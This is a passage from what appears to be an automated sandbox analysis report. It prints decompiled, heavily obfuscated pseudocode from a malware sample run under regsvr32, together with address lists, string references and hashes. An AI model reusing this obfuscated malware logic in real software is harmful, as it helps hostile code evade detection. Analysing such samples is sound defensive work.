								_t272 =  *0x4f82214; // 0x0
								 *_t286 = _t329;
								_t29 = _t329 + 0xc; // 0xc
								_t286 = _t29;
								 *(_t331 + 0x2c) = _t286;
								_t272[3] = _t272[3] + 1;
								_t244 = 0xd236a;
								continue;
							} else {
								if(_t244 == 0x7bdcf) {
									_t295 =  *0x4f82214; // 0x0
									_t244 = 0x294e6;
									_t286 =  &(_t295[7]);
									 *(_t331 + 0x2c) = _t286;
									continue;
								} else {
									if(_t244 == 0x7d484) {
										 *(_t331 + 0x18) = 0x16cbcc;
										 *(_t331 + 0x18) =  *(_t331 + 0x18) << 0x10;
										 *(_t331 + 0x18) =  *(_t331 + 0x18) << 3;
										_t296 = 0x3e;
										 *(_t331 + 0x1c) =  *(_t331 + 0x18) / _t296;
										 *(_t331 + 0x1c) =  *(_t331 + 0x1c) ^ 0x01846b1e;
										 *(_t331 + 0x30) = 0x935965;
										 *(_t331 + 0x30) =  *(_t331 + 0x30) << 4;
										 *(_t331 + 0x30) =  *(_t331 + 0x30) ^ 0x0930b5be;
										 *(_t331 + 0x20) = 0xd141fe;
										 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x1d083ccc;
										 *(_t331 + 0x20) =  *(_t331 + 0x20) << 3;
										 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0xcc81;
										_t237 = _t331 + 0x20;
										 *_t237 =  *(_t331 + 0x20) ^ 0xeec483aa;
										__eflags =  *_t237;
										E04F7E4B2( *(_t331 + 0x20),  *(_t331 + 0x34),  *_t237,  *(_t331 + 0x20),  *((intOrPtr*)(_t331 + 0x38)));
									} else {
										if(_t244 == 0xaefff) {
											 *(_t331 + 0x18) = 0xd0737a;
											 *(_t331 + 0x18) =  *(_t331 + 0x18) ^ 0x142cf9a4;
											 *(_t331 + 0x18) =  *(_t331 + 0x18) >> 0xe;
											 *(_t331 + 0x18) =  *(_t331 + 0x18) ^ 0x0004cd32;
											 *(_t331 + 0x1c) = 0x3e4ab2;
											_t300 = 0x7b;
											_push(_t300);
											 *(_t331 + 0x20) =  *(_t331 + 0x1c) / _t300;
											 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0x605f;
											 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x000bb730;
											_t321 = 0x50;
											_t329 = E04F73EE6(_t300, _t321, __eflags);
											__eflags = _t329;
											if(__eflags != 0) {
												_t244 = 0x3da8e;
												while(1) {
													L1:
													_t286 =  *(_t331 + 0x2c);
													goto L2;
												}
											}
										} else {
											if(_t244 != 0xd236a) {
												L16:
												__eflags = _t244 - 0x668e1;
												if(__eflags != 0) {
													while(1) {
														L1:
														_t286 =  *(_t331 + 0x2c);
														goto L2;
													}
												}
											} else {
												asm("sbb eax, eax");
												_t244 = (_t244 & 0x00031b7b) + 0x7d484;
												continue;
											}
										}
									}
								}
							}
						}
						_t288 =  *0x4f82214; // 0x0
						 *_t288 =  *_t288 & 0x00000000;
						_t288[1] = _t288[7];
						__eflags = 1;
						return 1;
					}
					 *(_t331 + 0x28) = 0x5b95b5;
					 *(_t331 + 0x28) =  *(_t331 + 0x28) >> 8;
					 *(_t331 + 0x28) =  *(_t331 + 0x28) ^ 0x00045794;
					 *(_t331 + 0x20) = 0x71381;
					 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0xffff8588;
					 *(_t331 + 0x20) =  *(_t331 + 0x20) >> 7;
					 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x0007b09e;
					 *(_t331 + 0x1c) = 0xb96d2f;
					 *(_t331 + 0x1c) =  *(_t331 + 0x1c) + 0xd4e9;
					 *(_t331 + 0x1c) =  *(_t331 + 0x1c) ^ 0x02719e63;
					 *(_t331 + 0x1c) =  *(_t331 + 0x1c) * 0x78;
					 *(_t331 + 0x1c) =  *(_t331 + 0x1c) ^ 0x4f819754;
					 *(_t331 + 0x24) = 0x3a9462;
					 *(_t331 + 0x24) =  *(_t331 + 0x24) * 0xa;
					 *(_t331 + 0x24) =  *(_t331 + 0x24) >> 2;
					 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0x009cbced;
					_push( *(_t331 + 0x24));
					_push(_t331 + 0x30);
					_push(0x4f82000);
					_push( *(_t331 + 0x28));
					_t248 = E04F62EF6( *((intOrPtr*)(_t331 + 0x38)),  *(_t331 + 0x30));
					 *((intOrPtr*)(_t331 + 0x48)) = _t248;
					_t323 = _t248;
					_t331 = _t331 + 0x10;
					_t249 = _t248 +  *(_t331 + 0x30);
					__eflags = _t249;
					 *(_t331 + 0x34) = _t249;
					_t244 = 0xaefff;
					goto L16;
				}
			}

0x04f637fd
0x04f63802
0x04f63809
0x04f6380f
0x04f63813
0x04f6381b
0x04f6381b
0x04f6381b
0x00000000
0x04f6381f
0x04f6382f
0x04f63920
0x04f63927
0x04f63931
0x04f63939
0x04f6393e
0x04f63944
0x04f6394c
0x04f63950
0x04f63958
0x04f63960
0x04f63965
0x04f6396d
0x04f63975
0x04f6397d
0x04f63985
0x04f6398f
0x04f63990
0x04f6399a
0x04f6399e
0x04f639a6
0x04f639ae
0x04f639b6
0x04f639be
0x04f639db
0x04f639e0
0x04f639ea
0x04f639f2
0x04f639fa
0x04f63a02
0x04f63a0a
0x04f63a0f
0x04f63a17
0x04f63a1f
0x04f63a27
0x04f63a2f
0x04f63a37
0x04f63a3c
0x04f63a44
0x04f63a4c
0x04f63a51
0x04f63a59
0x04f63a61
0x04f63a6e
0x04f63a72
0x04f63a75
0x04f63a7d
0x04f63a85
0x04f63a8d
0x04f63a95
0x04f63a9d
0x04f63ad4
0x04f63ad9
0x04f63ae1
0x04f63ae9
0x04f63af1
0x04f63af9
0x04f63b01
0x04f63b06
0x04f63b0e
0x04f63b16
0x04f63b1b
0x04f63b23
0x04f63b2b
0x04f63b33
0x04f63b3b
0x04f63b49
0x04f63b4d
0x04f63b65
0x04f63b6e
0x04f63b7c
0x04f63b80
0x04f63b83
0x04f63b86
0x04f63b96
0x04f63b9b
0x00000000
0x04f63835
0x04f6383a
0x04f638fb
0x04f63900
0x04f63902
0x04f63902
0x04f63905
0x04f63909
0x04f6390c
0x00000000
0x04f63840
0x04f63845
0x04f638e4
0x04f638ea
0x04f638ef
0x04f638f2
0x00000000
0x04f6384b
0x04f63850
0x04f63c5e
0x04f63c68
0x04f63c6d
0x04f63c78
0x04f63c7f
0x04f63c83
0x04f63c8b
0x04f63c93
0x04f63c98
0x04f63ca0
0x04f63ca8
0x04f63cb0
0x04f63cb5
0x04f63cbd
0x04f63cbd
0x04f63cbd
0x04f63cd1
0x04f63856
0x04f6385b
0x04f6387a
0x04f63884
0x04f6388c
0x04f63891
0x04f63899
0x04f638a7
0x04f638aa
0x04f638ab
0x04f638af
0x04f638b7
0x04f638c9
0x04f638cf
0x04f638d2
0x04f638d4
0x04f638da
0x04f6381b
0x04f6381b
0x04f6381b
0x00000000
0x04f6381b
0x04f6381b
0x04f6385d
0x04f63862
0x04f63c52
0x04f63c52
0x04f63c57
0x04f6381b
0x04f6381b
0x04f6381b
0x00000000
0x04f6381b
0x04f6381b
0x04f63868
0x04f6386c
0x04f63873
0x00000000
0x04f63873
0x04f63862
0x04f6385b
0x04f63850
0x04f63845
0x04f6383a
0x04f63cd8
0x04f63ce4
0x04f63ce7
0x04f63cec
0x04f63cf1
0x04f63cf1
0x04f63ba4
0x04f63bac
0x04f63bb1
0x04f63bb9
0x04f63bc1
0x04f63bc9
0x04f63bce
0x04f63bd6
0x04f63bde
0x04f63be6
0x04f63bf3
0x04f63bf7
0x04f63bff
0x04f63c0c
0x04f63c14
0x04f63c19
0x04f63c21
0x04f63c25
0x04f63c26
0x04f63c2b
0x04f63c37
0x04f63c3c
0x04f63c40
0x04f63c42
0x04f63c45
0x04f63c45
0x04f63c49
0x04f63c4d
0x00000000
0x04f63c4d

Strings

j#, xrefs: 04F6390C
j#, xrefs: 04F6385D
$T, xrefs: 04F63A8D
/9, xrefs: 04F639EA
_`, xrefs: 04F638AF

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $T$/9$_`$j#$j#
API String ID: 0-1098221873
Opcode ID: 2887d6b831c460df0a69f26b784ccaf8f5c749fa8d938a6ee5e9e03e9a8d50b2
Instruction ID: fff6b1444b405f0f90eb0d8a9cc93b8738ac9cbb6c19c8ca2b93415bc10b414a
Opcode Fuzzy Hash: 2887d6b831c460df0a69f26b784ccaf8f5c749fa8d938a6ee5e9e03e9a8d50b2
Instruction Fuzzy Hash: BBD133725083819FD345CF25C48985BFBE1FB98758F108A1DF4DA96260D3B8EA4ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 04F6B704 Relevance: 6.5, Strings: 5, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F6B704(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t215;
				void* _t234;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t265;
				void* _t268;
				signed int* _t274;

				_t274 =  &_v36;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x63e5f;
				_t265 = __edx;
				_t234 = __ecx;
				_v8 = 0x6139;
				_t268 = 0x9d7e6;
				while(1) {
					L1:
					do {
						L2:
						while(_t268 != 0x54b22) {
							if(_t268 == 0x87c72) {
								_v32 = 0x124876;
								_v32 = _v32 + 0xffffa62d;
								_v32 = _v32 << 4;
								_v32 = _v32 + 0xffff843e;
								_v32 = _v32 ^ 0x0113a2d0;
								_v20 = 0x428e48;
								_v20 = _v20 + 0xbfb6;
								_v20 = _v20 << 0xd;
								_v20 = _v20 ^ 0x69b2143c;
								_v24 = 0x9a3d4a;
								_t239 = 3;
								_v24 = _v24 / _t239;
								_v24 = _v24 ^ 0x003d1b6b;
								_v16 = 0x2e7864;
								_v16 = _v16 + 0x451;
								_v16 = _v16 ^ 0x00201c9b;
								_t215 = E04F6568D( *((intOrPtr*)(_t265 + 0x18)), _v32, _v20, _v24, _v16);
								_t274 =  &(_t274[3]);
								 *((intOrPtr*)(_t265 + 0x34)) = _t215;
								__eflags = _t215;
								_t212 = 0x9c713;
								_t268 =  !=  ? 0x9c713 : 0xd264f;
								continue;
							} else {
								if(_t268 == _t212) {
									_v32 = 0x7f46a4;
									_t241 = 0x30;
									_v32 = _v32 * 0x5b;
									_v32 = _v32 + 0xffffe074;
									_v32 = _v32 * 0x63;
									_v32 = _v32 ^ 0x7efc37c9;
									_v20 = 0x4f14de;
									_t242 = 6;
									_v20 = _v20 / _t241;
									_v20 = _v20 * 0x74;
									_v20 = _v20 ^ 0x00b0230e;
									_v24 = 0x3c608f;
									_v24 = _v24 * 0x7b;
									_v24 = _v24 / _t242;
									_v24 = _v24 ^ 0x04d2631f;
									_v36 = 0xd65fbc;
									_v36 = _v36 * 0x52;
									_v36 = _v36 >> 0xa;
									_v36 = _v36 << 0x10;
									_v36 = _v36 ^ 0x2aa16f1b;
									_v28 = 0xae3c6d;
									_v28 = _v28 ^ 0xece2792d;
									_v28 = _v28 | 0xc541602e;
									_v28 = _v28 ^ 0xed437355;
									_v16 = 0xc4b53b;
									_v16 = _v16 + 0xffff264d;
									_v16 = _v16 ^ 0x00c50fd1;
									_t212 = E04F7C75F(_t242, _v32, _v20, _v24, _v36, _t242, E04F63E87, _t242, _v28, _t242, _v16, _t265);
									_t274 =  &(_t274[0xa]);
									 *((intOrPtr*)(_t265 + 0x28)) = _t212;
									__eflags = _t212;
									if(__eflags == 0) {
										_t268 = 0xd264f;
										while(1) {
											L1:
											goto L2;
										}
									}
								} else {
									if(_t268 == 0x9d7e6) {
										_t268 = 0x54b22;
										continue;
									} else {
										if(_t268 != 0xd264f) {
											goto L16;
										} else {
											_v36 = 0x5fd3ca;
											_v36 = _v36 ^ 0x7a7625c5;
											_v36 = _v36 + 0xbc3f;
											_v36 = _v36 << 2;
											_v36 = _v36 ^ 0xe8ab6116;
											_v32 = 0xabbe6a;
											_v32 = _v32 | 0x4016bb42;
											_v32 = _v32 * 7;
											_v32 = _v32 + 0xffff2575;
											_v32 = _v32 ^ 0xc53bc439;
											_v16 = 0xc6dd75;
											_v16 = _v16 + 0x9983;
											_v16 = _v16 ^ 0x00cf587d;
											_t212 = E04F6CD57( *((intOrPtr*)(_t265 + 0x18)), _v36, _v32, _v16);
										}
									}
								}
							}
							L8:
							return _t212;
						}
						_v32 = 0x42c356;
						_v32 = _v32 >> 2;
						_v32 = _v32 + 0xffffde7b;
						_v32 = _v32 << 3;
						_v32 = _v32 ^ 0x0088f8b8;
						_v20 = 0x601a4c;
						_v20 = _v20 << 0xb;
						_v20 = _v20 >> 2;
						_v20 = _v20 ^ 0x003516a1;
						_t211 = E04F6F88D(_t234, __eflags, _v32, _v20);
						 *((intOrPtr*)(_t265 + 0x18)) = _t211;
						__eflags = _t211;
						if(_t211 == 0) {
							_t268 = 0x806c5;
							_t212 = 0x9c713;
							goto L16;
						} else {
							_v32 = 0x5006e8;
							_v32 = _v32 + 0xffff88b5;
							_t246 = 0x52;
							_v32 = _v32 * 0x28;
							_v32 = _v32 + 0x342e;
							_v32 = _v32 ^ 0x0c6ad752;
							_v24 = 0x1344ee;
							_v24 = _v24 / _t246;
							_v24 = _v24 ^ 0x00078d4e;
							_v20 = 0xc959b3;
							_v20 = _v20 * 0x14;
							_v20 = _v20 ^ 0x0fb44b94;
							_v16 = 0x83124b;
							_v16 = _v16 | 0xadb86f8b;
							_v16 = _v16 ^ 0xadb55e20;
							E04F76EB4(_v32, _v24,  *((intOrPtr*)(_t265 + 0x18)),  *((intOrPtr*)(_t265 + 0x18)), _v20, _v16);
							_v28 = 0xe77002;
							_v28 = _v28 + 0x60db;
							_v28 = _v28 ^ 0x36f7aae1;
							_v28 = _v28 ^ 0x361d811f;
							_v24 = 0xb039b2;
							_v24 = _v24 ^ 0x014aee98;
							_v24 = _v24 >> 6;
							_v24 = _v24 ^ 0x0006c7f1;
							_v16 = 0x52cb51;
							_v16 = _v16 << 6;
							_v16 = _v16 ^ 0x14b49782;
							_v20 = 0x7afb8d;
							_v20 = _v20 >> 2;
							_v20 = _v20 << 0xd;
							_v20 = _v20 ^ 0xd7dc1482;
							E04F7F05E(_v28, _v24,  *((intOrPtr*)(_t265 + 0x18)), _v16, _v20);
							_t274 =  &(_t274[7]);
							_t268 = 0x87c72;
							goto L1;
						}
						goto L8;
						L16:
						__eflags = _t268 - 0x806c5;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x04f6b704
0x04f6b707
0x04f6b710
0x04f6b718
0x04f6b71a
0x04f6b71c
0x04f6b724
0x04f6b72e
0x04f6b72e
0x04f6b733
0x00000000
0x04f6b733
0x04f6b745
0x04f6b905
0x04f6b90f
0x04f6b917
0x04f6b91c
0x04f6b924
0x04f6b92c
0x04f6b934
0x04f6b93c
0x04f6b941
0x04f6b949
0x04f6b957
0x04f6b95a
0x04f6b95e
0x04f6b966
0x04f6b96e
0x04f6b976
0x04f6b991
0x04f6b996
0x04f6b999
0x04f6b99c
0x04f6b9a0
0x04f6b9a5
0x00000000
0x04f6b74b
0x04f6b74d
0x04f6b7f5
0x04f6b806
0x04f6b809
0x04f6b80d
0x04f6b81a
0x04f6b81e
0x04f6b826
0x04f6b834
0x04f6b835
0x04f6b841
0x04f6b845
0x04f6b84d
0x04f6b85a
0x04f6b864
0x04f6b868
0x04f6b870
0x04f6b87d
0x04f6b881
0x04f6b886
0x04f6b88b
0x04f6b893
0x04f6b89b
0x04f6b8a3
0x04f6b8ab
0x04f6b8b3
0x04f6b8bb
0x04f6b8c3
0x04f6b8eb
0x04f6b8f0
0x04f6b8f3
0x04f6b8f6
0x04f6b8f8
0x04f6b8fe
0x04f6b72e
0x04f6b72e
0x00000000
0x04f6b72e
0x04f6b72e
0x04f6b753
0x04f6b759
0x04f6b7eb
0x00000000
0x04f6b75f
0x04f6b761
0x00000000
0x04f6b767
0x04f6b767
0x04f6b76f
0x04f6b777
0x04f6b77f
0x04f6b784
0x04f6b78c
0x04f6b794
0x04f6b7a1
0x04f6b7a5
0x04f6b7ad
0x04f6b7b5
0x04f6b7bd
0x04f6b7c5
0x04f6b7dc
0x04f6b7e2
0x04f6b761
0x04f6b759
0x04f6b74d
0x04f6b7e3
0x04f6b7ea
0x04f6b7ea
0x04f6b9ad
0x04f6b9b7
0x04f6b9bc
0x04f6b9c4
0x04f6b9c9
0x04f6b9d1
0x04f6b9d9
0x04f6b9de
0x04f6b9e3
0x04f6b9f3
0x04f6b9f8
0x04f6b9fd
0x04f6b9ff
0x04f6bb29
0x04f6bb2e
0x00000000
0x04f6ba05
0x04f6ba05
0x04f6ba0f
0x04f6ba1e
0x04f6ba1f
0x04f6ba23
0x04f6ba2b
0x04f6ba33
0x04f6ba41
0x04f6ba45
0x04f6ba4d
0x04f6ba5a
0x04f6ba5e
0x04f6ba66
0x04f6ba6e
0x04f6ba76
0x04f6ba93
0x04f6ba98
0x04f6baa0
0x04f6baa8
0x04f6bab0
0x04f6bab8
0x04f6bac0
0x04f6bac8
0x04f6bacd
0x04f6bad5
0x04f6badd
0x04f6bae2
0x04f6baea
0x04f6baf2
0x04f6baf7
0x04f6bafc
0x04f6bb17
0x04f6bb1c
0x04f6bb1f
0x00000000
0x04f6bb1f
0x00000000
0x04f6bb33
0x04f6bb33
0x04f6bb33
0x00000000
0x04f6bb3f

Strings

9a, xrefs: 04F6B71C
dx., xrefs: 04F6B966
O&, xrefs: 04F6B729
.4, xrefs: 04F6BA23
UsC, xrefs: 04F6B8AB

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .4$9a$O&$UsC$dx.
API String ID: 0-2072347715
Opcode ID: 92e4b7a7596fa38b09cd97f4ae12631692fe46ade4aeeb592a4b8b5e0bb13cb9
Instruction ID: 3cb44426f231c08c9b3cd05321ff1dda6216fa006b999e638726fa2e0c74f1c7
Opcode Fuzzy Hash: 92e4b7a7596fa38b09cd97f4ae12631692fe46ade4aeeb592a4b8b5e0bb13cb9
Instruction Fuzzy Hash: 76B1137150D3029BC358CF25D64950BBAE1BBC8B58F004A1DF4DAA6260D3B8DA5ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7BF4C Relevance: 6.4, Strings: 5, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04F7BF4C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t134;
				void* _t136;
				intOrPtr _t143;
				void* _t149;
				signed int _t152;
				signed int _t154;
				intOrPtr _t167;
				signed int* _t170;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(1);
				E04F732C4(_t134);
				_t166 = _v16;
				_t170 =  &(( &_v36)[8]);
				_t167 = 0;
				_v12 = 0xf148d;
				_t136 = 0x809a9;
				_v8 = 0;
				_v4 = 0;
				while(_t136 != 0x6e628) {
					if(_t136 == 0x7ee93) {
						_v28 = 0x4b8949;
						_v28 = _v28 >> 2;
						_v28 = _v28 ^ 0x00147ad3;
						_v36 = 0x6ae80d;
						_v36 = _v36 + 0x534b;
						_v36 = _v36 ^ 0xe3411643;
						_v36 = _v36 | 0x5513712b;
						_v36 = _v36 ^ 0xf7398d44;
						_t143 = E04F7F42E();
						_v36 = 0xa7e59b;
						_t166 = _t143;
						_v36 = _v36 ^ 0x7538cf42;
						_v36 = _v36 ^ 0xa4893aaa;
						_t154 = 0x1f;
						_v36 = _v36 / _t154;
						_v36 = _v36 ^ 0xf9415a4e;
						if(_t143 != _v36) {
							_t136 = 0xdaf2d;
							continue;
						}
					} else {
						if(_t136 == 0x809a9) {
							_t136 = 0x7ee93;
							continue;
						} else {
							if(_t136 == 0x9237f) {
								_v24 = 0xd2e6ae;
								_v24 = _v24 ^ 0x1e7631f8;
								_v24 = _v24 ^ 0x1eab0f0e;
								_v20 = 0xacfa9c;
								_v20 = _v20 | 0x0774e734;
								_v20 = _v20 ^ 0x07f4a9d7;
								_v36 = 0xfc2c9e;
								_v36 = _v36 + 0xffff86b8;
								_v36 = _v36 >> 6;
								_v36 = _v36 * 0x1a;
								_v36 = _v36 ^ 0x006630fe;
								E04F68B6C(_v24, _v16, _v20, _v36);
							} else {
								if(_t136 != 0xdaf2d) {
									L12:
									if(_t136 != 0xc8f73) {
										continue;
									} else {
									}
								} else {
									_v28 = 0x33b912;
									_v28 = _v28 << 1;
									_v28 = _v28 ^ 0x006739bd;
									_v36 = 0xa5d16e;
									_v36 = _v36 | 0x0e079846;
									_v36 = _v36 << 7;
									_v36 = _v36 + 0x9f7;
									_v36 = _v36 ^ 0x53e13055;
									_v32 = 0x47680a;
									_v32 = _v32 >> 0xf;
									_v32 = _v32 + 0x2893;
									_v32 = _v32 ^ 0x0006c377;
									_t149 = E04F63F29(_v28, _t166, _v36,  &_v16, _v32);
									_t170 =  &(_t170[3]);
									if(_t149 != 0) {
										_t136 = 0x6e628;
										continue;
									}
								}
							}
						}
					}
					return _t167;
				}
				_v28 = 0x2cb520;
				_v28 = _v28 | 0x52a842aa;
				_v28 = _v28 + 0xffff282d;
				_v28 = _v28 ^ 0x52afd93c;
				_v32 = 0xb77ca5;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0008b886;
				_v20 = 0x385030;
				_t81 =  &_v20; // 0x385030
				_t152 = 0x27;
				_v20 =  *_t81 / _t152;
				_v20 = _v20 ^ 0x00074394;
				_v36 = 0x227095;
				_v36 = _v36 + 0xb59a;
				_v36 = _v36 | 0x4f9fc4d3;
				_v36 = _v36 ^ 0x81ab7103;
				_v36 = _v36 ^ 0xce16aaa7;
				_v24 = 0xe5d88e;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00080424;
				E04F7F746(_v28, _v32, _a12, _v20, _t152, _a20, _v36, _v24, _v16, 1, 1);
				_t170 =  &(_t170[9]);
				_t136 = 0x9237f;
				_t167 =  !=  ? 1 : _t167;
				goto L12;
			}

0x04f7bf53
0x04f7bf59
0x04f7bf5e
0x04f7bf62
0x04f7bf66
0x04f7bf6a
0x04f7bf6e
0x04f7bf6f
0x04f7bf70
0x04f7bf75
0x04f7bf79
0x04f7bf7c
0x04f7bf7e
0x04f7bf86
0x04f7bf8b
0x04f7bf8f
0x04f7bf98
0x04f7bfa5
0x04f7c056
0x04f7c05e
0x04f7c063
0x04f7c06b
0x04f7c073
0x04f7c07b
0x04f7c083
0x04f7c08b
0x04f7c09b
0x04f7c0a0
0x04f7c0a8
0x04f7c0aa
0x04f7c0b4
0x04f7c0c2
0x04f7c0c5
0x04f7c0c9
0x04f7c0d5
0x04f7c0db
0x00000000
0x04f7c0db
0x04f7bfab
0x04f7bfb0
0x04f7c04c
0x00000000
0x04f7bfb6
0x04f7bfbb
0x04f7c1bd
0x04f7c1c5
0x04f7c1cd
0x04f7c1d5
0x04f7c1dd
0x04f7c1e5
0x04f7c1ed
0x04f7c1f5
0x04f7c1fd
0x04f7c207
0x04f7c20b
0x04f7c223
0x04f7bfc1
0x04f7bfc6
0x04f7c1b0
0x04f7c1b5
0x00000000
0x00000000
0x04f7c1bb
0x04f7bfcc
0x04f7bfcc
0x04f7bfd8
0x04f7bfde
0x04f7bfe6
0x04f7bfee
0x04f7bff6
0x04f7bffb
0x04f7c003
0x04f7c00b
0x04f7c013
0x04f7c018
0x04f7c020
0x04f7c035
0x04f7c03a
0x04f7c03f
0x04f7c045
0x00000000
0x04f7c045
0x04f7c03f
0x04f7bfc6
0x04f7bfbb
0x04f7bfb0
0x04f7c233
0x04f7c233
0x04f7c0e5
0x04f7c0ef
0x04f7c0f7
0x04f7c0ff
0x04f7c107
0x04f7c10f
0x04f7c114
0x04f7c119
0x04f7c121
0x04f7c129
0x04f7c12f
0x04f7c133
0x04f7c137
0x04f7c13f
0x04f7c147
0x04f7c14f
0x04f7c157
0x04f7c15f
0x04f7c167
0x04f7c16f
0x04f7c174
0x04f7c19e
0x04f7c1a3
0x04f7c1a8
0x04f7c1ad
0x00000000

Strings

U0S, xrefs: 04F7C003
0P8, xrefs: 04F7C129
j, xrefs: 04F7C06B
KS, xrefs: 04F7C073
hG, xrefs: 04F7C00B

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: hG$j$0P8$KS$U0S
API String ID: 0-2023812266
Opcode ID: 9aa1a07c219261656e4e63aee0633b75ce3dfc8695bffa891eca8ba9db2feadd
Instruction ID: 28d4fb79598e6932ac8f21ac32d2460ffa0945801c2d026b8f651ae0327dc214
Opcode Fuzzy Hash: 9aa1a07c219261656e4e63aee0633b75ce3dfc8695bffa891eca8ba9db2feadd
Instruction Fuzzy Hash: 1B6112B25093829FC748CF60D84941BBBE2FBD8748F004E1EF59596220D3B9DA59CB97

Uniqueness

Uniqueness Score: -1.00%

Function 04F75689 Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04F75689(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v284;
				char _t135;
				void* _t142;
				signed int _t150;
				void* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				signed int _t164;
				char* _t169;
				intOrPtr* _t185;

				_t185 = __ecx;
				_v12 = 0xfb788;
				_t169 =  &_v284;
				while(1) {
					_t135 =  *_t185;
					if(_t135 == 0) {
						break;
					}
					if(_t135 == 0x2e) {
						 *_t169 = 0;
					} else {
						 *_t169 = _t135;
						_t169 = _t169 + 1;
						_t185 = _t185 + 1;
						continue;
					}
					L6:
					_v8 = 0x6fd0fd;
					_v8 = _v8 ^ 0xe0ca8af9;
					_t157 = 0x5e;
					_v8 = _v8 / _t157;
					_t158 = 0x23;
					_v8 = _v8 / _t158;
					_v8 = _v8 ^ 0x00196b9e;
					_v16 = 0x5f78b;
					_v16 = _v16 + 0xe989;
					_v16 = _v16 + 0xffff480a;
					_v16 = _v16 * 0x62;
					_v16 = _v16 ^ 0x025650c7;
					_t142 = E04F7EFB6(_v8, _v16,  &_v284);
					_t184 = _t142;
					if(_t142 != 0) {
						L8:
						_v8 = 0xc9f564;
						_v8 = _v8 + 0xee2f;
						_t161 = 0x55;
						_v8 = _v8 / _t161;
						_v8 = _v8 + 0xc89a;
						_v8 = _v8 ^ 0x00032ba6;
						_v12 = 0xb0c2d6;
						_v12 = _v12 + 0xa288;
						_v12 = _v12 << 4;
						_v12 = _v12 ^ 0x0b1b97d3;
						_v24 = 0x23a00a;
						_v24 = _v24 + 0xffff2e55;
						_t162 = 0x33;
						_v24 = _v24 * 0x52;
						_v24 = _v24 ^ 0x0b253f11;
						_v16 = 0xd646a1;
						_v16 = _v16 >> 0xf;
						_v16 = _v16 + 0xffff7b60;
						_v16 = _v16 + 0x498c;
						_v16 = _v16 ^ 0xfffe9ad4;
						_v20 = 0xe05f79;
						_t86 =  &_v20; // 0xe05f79
						_v20 =  *_t86 / _t162;
						_v20 = _v20 + 0x4fe1;
						_v20 = _v20 ^ 0x000ad936;
						_t150 = E04F61918(_v24, _v16, _v20, _v8 + _t185);
						_v12 = 0xb97d8a;
						_t164 = 0x42;
						_v12 = _v12 / _t164;
						_push(_t150 ^ 0x3038c829);
						_v12 = _v12 * 0x77;
						_v12 = _v12 ^ 0x014ad2e1;
						_v20 = 0x19a357;
						_v20 = _v20 + 0x78c6;
						_v20 = _v20 ^ 0x0015649d;
						_v24 = 0x416865;
						_v24 = _v24 >> 0xb;
						_v24 = _v24 ^ 0x00086675;
						_v8 = 0x6a9915;
						_v8 = _v8 >> 2;
						_v8 = _v8 | 0xee5c00a2;
						_v8 = _v8 ^ 0x813e6845;
						_v8 = _v8 ^ 0x6f618f48;
						_push(_v8);
						_push(_v24);
						_push(_v20);
						return E04F7E10C(_v12, _t184);
					}
					_v12 = 0x77ef4e;
					_v12 = _v12 + 0x20e8;
					_v12 = _v12 ^ 0x007994e5;
					_v8 = 0xbac24a;
					_v8 = _v8 | 0xf93c64eb;
					_v8 = _v8 ^ 0x62ae9115;
					_v8 = _v8 | 0x732efc63;
